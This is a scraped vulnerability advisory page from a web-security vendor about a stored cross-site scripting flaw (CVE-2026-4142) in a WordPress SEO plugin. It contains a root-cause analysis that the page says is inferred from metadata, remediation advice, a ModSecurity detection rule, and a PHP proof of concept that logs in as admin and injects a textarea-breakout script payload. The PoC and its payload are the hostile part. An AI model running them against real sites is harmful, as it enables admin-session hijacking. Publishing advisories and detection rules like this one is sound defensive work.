CVE-2026-4142: Sentence To SEO (keywords, description and tags) <= 1.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'Permanent keywords' Field (sentence-to-seo)

Atomic Edge analysis of CVE-2026-4142 (metadata-based): The Sentence To SEO plugin for WordPress contains a stored cross-site scripting vulnerability in all versions up to and including 1.0. An authenticated attacker with administrator-level access can inject arbitrary HTML and JavaScript through the ‘Permanent keywords’ field. The vulnerability arises because the plugin uses filter_input_array(INPUT_POST) with FILTER_DEFAULT, which applies no sanitization. The unsanitized input is stored via update_option() in the options table and later output directly into a textarea element using PHP short echo tags () without escaping. This allows an attacker to break out of the textarea by injecting a closing tag. Atomic Edge analysis confirms the root cause based on the CWE-79 classification and the explicit description from the CVE metadata, though no source code diff is available for independent verification.

The root cause is the complete absence of input sanitization and output escaping. The plugin reads user input via filter_input_array(INPUT_POST, array(‘field_name’ => FILTER_DEFAULT)). FILTER_DEFAULT applies no sanitization, leaving the raw input intact. The plugin then stores this unsanitized value into the WordPress options table using update_option(). When displaying the settings page, the plugin outputs the stored value directly into a textarea element with PHP short echo tags () without any escaping function like esc_textarea() or esc_html(). An attacker can include a closing tag in the value, which prematurely closes the textarea element, allowing arbitrary HTML and JavaScript to be injected into the page. Atomic Edge infers these code patterns from the CWE classification and the CVE description; they are not confirmed from source code because the plugin is not available for download.

Exploitation requires administrator-level access to the WordPress admin panel. The attacker navigates to the plugin’s settings page, likely under the admin menu for ‘Sentence To SEO’. The vulnerable field is the ‘Permanent keywords’ textarea. The attacker submits a payload like alert(‘XSS’) via a POST request to the plugin’s settings update endpoint. The endpoint is likely a standard WordPress admin POST handler using the actions ‘update_options’ or a custom action hook. The payload breaks out of the textarea, closes the HTML element, and injects a script tag. The injected script executes whenever any administrator views the plugin settings page, including the attacker who submitted it. The CVSS vector (AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N) confirms the attack requires high privileges (admin+) and high attack complexity, likely because the nonce check must be bypassed or because the attacker must already have admin access.</p> <p>Remediation requires implementing proper input sanitization and output escaping. When reading input, the plugin should use sanitize_text_field() or esc_attr_raw() for single-line fields, or wp_kses_post() for multi-line fields that need to allow some HTML. For output, the plugin must use esc_textarea() when outputting values into a textarea element. This function encodes special characters like , and & to their HTML entities, preventing any HTML injection. The fix should apply to the ‘Permanent keywords’ field and any other fields that lack sanitization and escaping. Without a patched version available, administrators should disable the plugin immediately and replace it with an alternative that properly handles user input.</p> <p>Successful exploitation allows an attacker to inject persistent JavaScript that executes in the context of the WordPress admin panel. This can lead to session hijacking, cookie theft, and cross-site request forgery (CSRF) attacks. The attacker can create rogue administrator accounts, modify plugin settings, inject backdoors into WordPress core files, or exfiltrate sensitive data. Since the script executes on the settings page, an attacker can steal the current user’s session token and impersonate that administrator. The stored XSS persists in the options table until manually removed, making it a persistent threat. Although the CVSS score is 4.4 (medium), the actual impact is significant because it targets the admin interface and can lead to full site compromise.</p> </div><h3 id="brxe-lauoca" class="brxe-heading">ModSecurity Protection Against This CVE</h3><div id="brxe-jkoxjs" class="brxe-text"><p>Here you will find our ModSecurity compatible rule to protect against this particular CVE.</p> <div class="atomic-proof-code-window"> <div class="atomic-proof-code-header"> <div class="atomic-proof-code-dots"><span></span><span></span><span></span></div> <span class="atomic-proof-code-lang">ModSecurity</span> <button type="button" class="atomic-proof-copy-btn" aria-label="Copy code"> <svg viewBox="0 0 24 24" aria-hidden="true"><path d="M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z"/></svg> Copy </button> </div> <pre class="line-numbers"><code class="language-apacheconf"># Atomic Edge WAF Rule - CVE-2026-4142 (metadata-based) # Rule blocks XSS payloads in the 'permanent_keywords' parameter sent to the Sentence To SEO settings update endpoint. SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" "id:20261941,phase:2,deny,status:403,chain,msg:'CVE-2026-4142 Stored XSS via Permanent keywords field in Sentence To SEO plugin',severity:'CRITICAL',tag:'CVE-2026-4142',tag:'wordpress',tag:'plugin-sentence-to-seo'" SecRule ARGS_POST:action "@streq update_sentence_to_seo_options" "chain" SecRule ARGS_POST:permanent_keywords "@rx </textareas*>" "t:none,t:urlDecodeUni,t:htmlEntityDecode" </code></pre> </div> </div><h3 id="brxe-ubgvwt" class="brxe-heading">Proof of Concept (PHP)</h3><div id="brxe-hkcyef" class="brxe-text"><p><b>NOTICE :</b></p> <div class="relative w-full mt-4 mb-1"> <div class=""> <div class="relative"> <div class="h-full min-h-0 min-w-0"> <div class="h-full min-h-0 min-w-0"> <div class="border border-token-border-light border-radius-3xl corner-superellipse/1.1 rounded-3xl"> <div class="h-full w-full border-radius-3xl bg-token-bg-elevated-secondary corner-superellipse/1.1 overflow-clip rounded-3xl lxnfua_clipPathFallback"> <div class="pe-11 pt-3"> <div class="relative z-0 flex max-w-full"> <div id="code-block-viewer" class="q9tKkq_viewer cm-editor z-10 light:cm-light dark:cm-light flex h-full w-full flex-col items-stretch ͼ5 ͼj" dir="ltr"> <div class="cm-scroller"> <div class="cm-content q9tKkq_readonly"> <div class="relative w-full mt-4 mb-1"> <div class=""> <div class="relative"> <div class="h-full min-h-0 min-w-0"> <div class="h-full min-h-0 min-w-0"> <div class="border border-token-border-light border-radius-3xl corner-superellipse/1.1 rounded-3xl"> <div class="h-full w-full border-radius-3xl bg-token-bg-elevated-secondary corner-superellipse/1.1 overflow-clip rounded-3xl lxnfua_clipPathFallback"> <div class="pe-11 pt-3"> <div class="relative z-0 flex max-w-full"> <div id="code-block-viewer" class="q9tKkq_viewer cm-editor z-10 light:cm-light dark:cm-light flex h-full w-full flex-col items-stretch ͼ5 ͼj" dir="ltr"> <div class="cm-scroller"> <div class="cm-content q9tKkq_readonly"> <p>This proof-of-concept is provided for educational and authorized security research purposes only.</p> <p>You may not use this code against any system, application, or network without explicit prior authorization from the system owner.</p> <p>Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.</p> <p>This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.</p> <p>By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.</p> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class=""> <div class=""> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div><div id="brxe-loolxc" class="brxe-text"> <div class="atomic-proof-code-window"> <div class="atomic-proof-code-header"> <div class="atomic-proof-code-dots"><span></span><span></span><span></span></div> <span class="atomic-proof-code-lang">PHP PoC</span> <button type="button" class="atomic-proof-copy-btn" aria-label="Copy code"> <svg viewBox="0 0 24 24" aria-hidden="true"><path d="M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z"/></svg> Copy </button> </div> <pre class="line-numbers"><code class="language-php">// ========================================================================== // Atomic Edge CVE Research | https://atomicedge.io // Copyright (c) Atomic Edge. All rights reserved. // // LEGAL DISCLAIMER: // This proof-of-concept is provided for authorized security testing and // educational purposes only. Use of this code against systems without // explicit written permission from the system owner is prohibited and may // violate applicable laws including the Computer Fraud and Abuse Act (USA), // Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national // computer misuse statutes. This code is provided "AS IS" without warranty // of any kind. Atomic Edge and its authors accept no liability for misuse, // damages, or legal consequences arising from the use of this code. You are // solely responsible for ensuring compliance with all applicable laws in // your jurisdiction before use. // ========================================================================== <?php // Atomic Edge CVE Research - Proof of Concept (metadata-based) // CVE-2026-4142 - Sentence To SEO (keywords, description and tags) <= 1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting // This PoC demonstrates how an authenticated administrator can exploit the stored XSS // by submitting a malicious payload into the 'Permanent keywords' field. $target_url = 'http://example.com'; // Change this to the target WordPress site URL $admin_username = 'admin'; // Administrator username $admin_password = 'password'; // Administrator password // The plugin settings page URL (assumed to be under wp-admin/admin.php with a specific slug) $settings_url = $target_url . '/wp-admin/options-general.php?page=sentence-to-seo'; $post_url = $target_url . '/wp-admin/admin-post.php'; // Step 1: Login as administrator $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($admin_username) . '&pwd=' . urlencode($admin_password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1'); curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_exec($ch); // Step 2: Fetch the settings page to obtain the nonce value curl_setopt($ch, CURLOPT_URL, $settings_url); curl_setopt($ch, CURLOPT_POST, 0); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); $response = curl_exec($ch); // Extract the nonce from the response (assumed pattern: name="_wpnonce" value="...") preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches); $nonce = isset($matches[1]) ? $matches[1] : ''; if (empty($nonce)) { die('Failed to retrieve nonce. Check login credentials or URL.'); } // Step 3: Craft the malicious payload (break out of textarea and inject XSS) $xss_payload = '</textarea><script>alert("XSS_CVE_2026_4142");</script><textarea>'; // Step 4: Submit the payload to the settings update endpoint curl_setopt($ch, CURLOPT_URL, $post_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'update_sentence_to_seo_options', // Assumed action hook '_wpnonce' => $nonce, '_wp_http_referer' => urlencode($settings_url), 'permanent_keywords' => $xss_payload ]); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); $response = curl_exec($ch); // Check if the request was successful (redirect to settings page with 'updated=true') if (strpos($response, 'updated=true') !== false || strpos($response, 'settings-updated') !== false) { echo "[+] XSS payload submitted successfully.n"; echo "[+] Payload: " . $xss_payload . "n"; echo "[+] Visit the settings page to trigger the XSS: " . $settings_url . "n"; } else { echo "[!] Failed to submit payload. Check the action hook and nonce handling.n"; } curl_close($ch); ?> </code></pre> </div> </div></div></section><section id="brxe-fe15ca" class="brxe-section cve-faq-container"><div id="brxe-4bd604" class="brxe-container"><div id="brxe-f3279f" class="brxe-block"><h2 id="brxe-a88a1a" class="brxe-heading h2-page">Frequently Asked Questions</h2><ul id="brxe-259e14" data-script-id="259e14" class="brxe-accordion" role="presentation"></ul><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"FAQPage","mainEntity":[]}</script></div></div></section><section id="see-how-it-works" class="brxe-section"><div id="brxe-zmhffz" class="brxe-container"><div id="brxe-reoqft" class="brxe-block"><img width="591" height="134" src="https://atomicedge.io/wp-content/uploads/2025/11/atomic-edge-icon-7-fixed.png" class="brxe-image css-filter size-full" alt="" id="brxe-olmagr" decoding="async" srcset="https://atomicedge.io/wp-content/uploads/2025/11/atomic-edge-icon-7-fixed.png 591w, https://atomicedge.io/wp-content/uploads/2025/11/atomic-edge-icon-7-fixed-300x68.png 300w" sizes="(max-width: 591px) 100vw, 591px" /></div><div id="brxe-tbhexs" class="brxe-block"><h2 id="brxe-rbsifa" class="brxe-heading h2-page">How <span style="color: #5D4AE3">Atomic Edge</span> Works</h2><div id="brxe-tepsls" class="brxe-text"><p>Simple Setup. Powerful Security.</p> <p>Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.</p> </div><a id="brxe-bbferh" class="brxe-button primary-button bricks-button bricks-background-primary" href="https://dashboard.atomicedge.io/register">Get Started<i class="ti-arrow-circle-right"></i></a></div></div></section><section id="brxe-59199d" class="brxe-section"><div id="brxe-02e6b0" class="brxe-container"><nav id="brxe-b1f9ff" class="brxe-post-navigation" aria-label="Post navigation"><a class="prev-post" href="https://atomicedge.io/cve-proof/cve-2026-4280-breaking-news-wp-version-1-3-medium-vulnerability-proof-of-concept/"><div class="swiper-button bricks-swiper-button-prev"><i class="fas fa-arrow-left"></i></div><div class="content"><span class="label">Previous CVE PoC</span></div></a><a class="next-post" href="https://atomicedge.io/cve-proof/cve-2026-4140-ni-woocommerce-order-export-version-3-1-6-medium-vulnerability-proof-of-concept/"><div class="content"><span class="label">Next CVE PoC</span></div><div class="swiper-button bricks-swiper-button-next"><i class="fas fa-arrow-right"></i></div></a></nav></div></section><section id="brxe-5edbdd" class="brxe-section"><div id="brxe-1440db" class="brxe-container"><h3 id="brxe-1d67c0" class="brxe-heading h2-page">Trusted by <span style="color: #5D4AE3">Developers & Organizations</span></h3></div><div id="brxe-e6f9e8" class="brxe-container"><div id="brxe-9ef79d" class="brxe-block"><img width="809" height="499" src="https://atomicedge.io/wp-content/uploads/2025/04/trusted-by-img-2.1.png" class="brxe-image css-filter size-full" alt="Trusted by Developers" id="brxe-b28fb1" decoding="async" srcset="https://atomicedge.io/wp-content/uploads/2025/04/trusted-by-img-2.1.png 809w, https://atomicedge.io/wp-content/uploads/2025/04/trusted-by-img-2.1-300x185.png 300w, https://atomicedge.io/wp-content/uploads/2025/04/trusted-by-img-2.1-768x474.png 768w" sizes="(max-width: 809px) 100vw, 809px" /></div><div id="brxe-991926" class="brxe-block brx-grid"><img width="195" height="97" src="https://atomicedge.io/wp-content/uploads/2025/04/BlackMcDonald_Logo.png" class="brxe-image css-filter size-full" alt="Blac&kMcDonald" id="brxe-6fccf0" decoding="async" loading="lazy" /><img width="254" height="84" src="https://atomicedge.io/wp-content/uploads/2025/04/covenant-house-toronto-logo.png" class="brxe-image css-filter size-full" alt="Covenant House Toronto" id="brxe-d2efc5" decoding="async" loading="lazy" /><img width="197" height="40" src="https://atomicedge.io/wp-content/uploads/2025/04/alzheimer-society-canada-logo.png" class="brxe-image css-filter size-full" alt="Alzheimer Society Canada" id="brxe-24d948" decoding="async" loading="lazy" /><img width="202" height="72" src="https://atomicedge.io/wp-content/uploads/2025/04/university-of-toronto-logo.png" class="brxe-image css-filter size-full" alt="University of Toronto" id="brxe-d1e50e" decoding="async" loading="lazy" /><img width="197" height="75" src="https://atomicedge.io/wp-content/uploads/2025/11/specsavers.png" class="brxe-image css-filter size-full" alt="" id="brxe-4d54ae" decoding="async" loading="lazy" /><img width="200" height="51" src="https://atomicedge.io/wp-content/uploads/2025/04/harvard-medical-school-logo.png" class="brxe-image css-filter size-full" alt="Harvard Medical School" id="brxe-3d32cd" decoding="async" loading="lazy" /></div></div></section><section id="brxe-d9e649" class="brxe-section"><div id="brxe-5f3ffc" class="brxe-container"></div></section></main><footer id="brx-footer"><section id="brxe-gpwvpn" class="brxe-section"><div id="brxe-abqerh" class="brxe-container"><h2 id="brxe-dvbmbt" class="brxe-heading h2-page">Ready to Get Started</h2><div id="brxe-jpxhuj" class="brxe-text"><p style="text-align: center;">It only takes a few clicks to get started</p> </div><a id="brxe-cntbck" class="brxe-button bricks-button bricks-background-primary" href="https://dashboard.atomicedge.io/register">Create a Free Account</a></div><div id="brxe-jbrlcq" class="brxe-container"><div id="brxe-vphhkc" data-script-id="vphhkc" class="brxe-nav-menu"><nav class="bricks-nav-menu-wrapper never"><ul id="menu-footer" class="bricks-nav-menu"><li id="menu-item-765" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-765 bricks-menu-item"><a href="https://atomicedge.io/legal/policies-notices/">Policies & Notices</a></li> <li id="menu-item-766" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-766 bricks-menu-item"><a href="https://atomicedge.io/legal/copyright-policy/">Copyright Policy</a></li> <li id="menu-item-767" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-767 bricks-menu-item"><a href="https://atomicedge.io/legal/service-level-agreement/">Service Level Agreement</a></li> <li id="menu-item-768" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-768 bricks-menu-item"><a href="https://atomicedge.io/legal/acceptable-use-policy/">Acceptable Use Policy</a></li> <li id="menu-item-769" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-769 bricks-menu-item"><a href="https://atomicedge.io/legal/terms-of-service/">Terms of service</a></li> <li id="menu-item-773" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-773 bricks-menu-item"><a href="https://atomicedge.io/legal/privacy-policy/">Privacy Policy</a></li> </ul></nav></div></div><div id="brxe-rlbprf" class="brxe-container"><div id="brxe-ljquef" data-script-id="ljquef" class="brxe-nav-menu"><nav class="bricks-nav-menu-wrapper never"><ul id="menu-compare-us" class="bricks-nav-menu"><li id="menu-item-1651" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1651 bricks-menu-item"><a href="https://atomicedge.io/atomic-edge-vs-cloudflare/">Atomic Edge vs. Cloudflare</a></li> <li id="menu-item-1662" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1662 bricks-menu-item"><a href="https://atomicedge.io/atomic-edge-vs-sucuri/">Atomic Edge vs. Sucuri</a></li> <li id="menu-item-6129" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6129 bricks-menu-item"><a href="https://atomicedge.io/atomic-edge-vs-wordfence/">Atomic Edge vs. Wordfence</a></li> <li id="menu-item-6130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6130 bricks-menu-item"><a href="https://atomicedge.io/wp-security-plugin-wordpress-security/">WordPress Security Plugin</a></li> </ul></nav></div></div><div id="brxe-yskxul" class="brxe-container"><div id="brxe-qqbekp" class="brxe-block"><div id="brxe-bbfbdm" class="brxe-text"><p>2026 Star Dot Hosting Inc All Rights Reserved. Atomic Edge is an operating name of Star Dot Hosting Inc.</p> </div></div></div></section></footer><script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/atomicedge-child/*","/wp-content/themes/bricks/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script> <script id="wpil-frontend-script-js-extra"> var wpilFrontend = {"ajaxUrl":"/wp-admin/admin-ajax.php","postId":"9186","postType":"post","openInternalInNewTab":"0","openExternalInNewTab":"0","disableClicks":"0","openLinksWithJS":"0","trackAllElementClicks":"0","clicksI18n":{"imageNoText":"Image in link: No Text","imageText":"Image Title: ","noText":"No Anchor Text Found"}}; //# sourceURL=wpil-frontend-script-js-extra </script> <script src="https://atomicedge.io/wp-content/plugins/link-whisper-premium/js/frontend.min.js?ver=1776392609" id="wpil-frontend-script-js"></script> <script id="atomic-proof-form-poll-js-extra"> var atomicProofPoll = {"ajaxUrl":"https://atomicedge.io/wp-admin/admin-ajax.php","nonce":"3b0c75eb0a","interval":"5000","maxDuration":"180000"}; //# sourceURL=atomic-proof-form-poll-js-extra </script> <script src="https://atomicedge.io/wp-content/plugins/atomic-proof/admin/js/form-poll.js?ver=1.3.0" id="atomic-proof-form-poll-js"></script> <script id="bricks-scripts-js-extra"> var bricksData = {"debug":"","locale":"en_US","ajaxUrl":"https://atomicedge.io/wp-admin/admin-ajax.php","restApiUrl":"https://atomicedge.io/wp-json/bricks/v1/","nonce":"ae7dafc2e2","formNonce":"fdb65b1948","wpRestNonce":"6cc839a42d","postId":"9186","recaptchaIds":[],"animatedTypingInstances":[],"videoInstances":[],"splideInstances":[],"tocbotInstances":[],"swiperInstances":[],"queryLoopInstances":[],"interactions":[],"filterInstances":[],"isotopeInstances":[],"activeFiltersCountInstances":[],"googleMapInstances":[],"leafletMapInstances":[],"choicesInstances":[],"facebookAppId":"","headerPosition":"top","offsetLazyLoad":"300","baseUrl":"https://atomicedge.io/cve-proof/cve-2026-4142-sentence-to-seo-version-1-0-medium-vulnerability-proof-of-concept/","useQueryFilter":"","pageFilters":[],"language":"","wpmlUrlFormat":"","multilangPlugin":"","i18n":{"closeMobileMenu":"Close mobile menu","firstSlide":"Go to first slide","hidePassword":"Hide password","lastSlide":"Go to last slide","locationContent":"Location content","locationSubtitle":"Location subtitle","locationTitle":"Location title","nextSlide":"Next slide","noLocationsFound":"No locations found","openAccordion":"Open accordion","openMobileMenu":"Open mobile menu","pause":"Pause autoplay","play":"Start autoplay","prevSlide":"Previous slide","remove":"Remove","showPassword":"Show password","slideX":"Go to slide %s","splide":{"carousel":"carousel","select":"Select a slide to show","slide":"slide","slideLabel":"%1$s of %2$s"},"swiper":{"paginationBulletMessage":"Go to slide {{index}}","slideLabelMessage":"{{index}} / {{slidesLength}}"}},"selectedFilters":[],"filterNiceNames":[],"bricksGoogleMarkerScript":"https://atomicedge.io/wp-content/themes/bricks/assets/js/libs/bricks-google-marker.min.js?v=2.3.3","infoboxScript":"https://atomicedge.io/wp-content/themes/bricks/assets/js/libs/infobox.min.js?v=2.3.3","markerClustererScript":"https://atomicedge.io/wp-content/themes/bricks/assets/js/libs/markerclusterer.min.js?v=2.3.3","mainQueryId":"","activeSearchTemplate":"0","defaultMode":"light"}; //# sourceURL=bricks-scripts-js-extra </script> <script src="https://atomicedge.io/wp-content/themes/bricks/assets/js/bricks.min.js?ver=1776998717" id="bricks-scripts-js"></script> <script src="https://atomicedge.io/wp-content/plugins/atomic-proof/admin/assets/vendor/prism/prism-bundle.min.js?ver=1.3.0" id="atomic-proof-prism-js"></script> <script src="https://atomicedge.io/wp-content/plugins/atomic-proof/admin/js/code-window.js?ver=1.3.0" id="atomic-proof-code-window-js"></script> <!-- Start of LiveChat (www.livechat.com) code --> <script> window.__lc = window.__lc || {}; window.__lc.license = 19529646; window.__lc.integration_name = "manual_channels"; window.__lc.product_name = "livechat"; ;(function(n,t,c){function i(n){return e._h?e._h.apply(null,n):e._q.push(n)}var e={_q:[],_h:null,_v:"2.0",on:function(){i(["on",c.call(arguments)])},once:function(){i(["once",c.call(arguments)])},off:function(){i(["off",c.call(arguments)])},get:function(){if(!e._h)throw new Error("[LiveChatWidget] You can't use getters before load.");return i(["get",c.call(arguments)])},call:function(){i(["call",c.call(arguments)])},init:function(){var n=t.createElement("script");n.async=!0,n.type="text/javascript",n.src="https://cdn.livechatinc.com/tracking.js",t.head.appendChild(n)}};!n.__lc.asyncInit&&e.init(),n.LiveChatWidget=n.LiveChatWidget||e}(window,document,[].slice)) </script> <noscript><a href="https://www.livechat.com/chat-with/19529646/" rel="nofollow">Chat with us</a>, powered by <a href="https://www.livechat.com/?welcome" rel="noopener nofollow" target="_blank">LiveChat</a></noscript> <!-- End of LiveChat code --> </body></html>